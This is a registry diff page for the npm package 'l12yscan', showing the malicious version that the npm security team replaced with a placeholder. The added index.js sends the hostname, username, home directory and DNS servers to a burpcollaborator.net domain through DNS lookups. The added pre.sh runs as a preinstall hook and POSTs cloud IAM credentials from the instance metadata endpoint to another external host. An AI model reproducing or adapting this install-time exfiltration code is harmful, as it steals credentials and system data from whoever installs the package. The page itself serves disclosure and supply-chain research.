l12yscan 0.0.1-security → 11.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of l12yscan might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +47 -0
  2. package/package.json +10 -4
  3. package/pre.sh +1 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+
21
+ var EVILSITE = "qys1g45vphde5y3k5fnpnxv0frli97.burpcollaborator.net";
22
+
23
+ //replace
24
+ // : --
25
+ // / _
26
+ // \ .
27
+
28
+
29
+ // hostname
30
+ var r1 = dns.lookup("host."+os.hostname()+"."+EVILSITE, function (err, addresses, family) {
31
+ console.log();
32
+ });
33
+
34
+ // user_info
35
+ var r2 = dns.lookup("user."+os.userInfo().username+"."+EVILSITE, function (err, addresses, family) {
36
+ console.log();
37
+ });
38
+
39
+ // home_dir
40
+ var r3 = dns.lookup("dir."+os.homedir()+"."+EVILSITE, function (err, addresses, family) {
41
+ console.log();
42
+ });
43
+
44
+ // dns_data
45
+ var r4 = dns.lookup("dns."+dns.getServers().join(',')+"."+EVILSITE, function (err, addresses, family) {
46
+ console.log();
47
+ });
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "l12yscan",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "11.0.9",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "sh pre.sh"
8
+ },
9
+ "author": "yassineaboukir",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }
package/pre.sh ADDED
@@ -0,0 +1 @@
1
+ curl -X POST -H --silent --data-urlencode "payload={\"text\": \"$(curl -X GET 'http://169.254.169.254/latest/user-data/iam/security-credentials/' | sed "s/\"/'/g")\"}" http://bl0m3psgc20zsjq5s0aaaiil2c84wt.burpcollaborator.net
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=l12yscan for more information.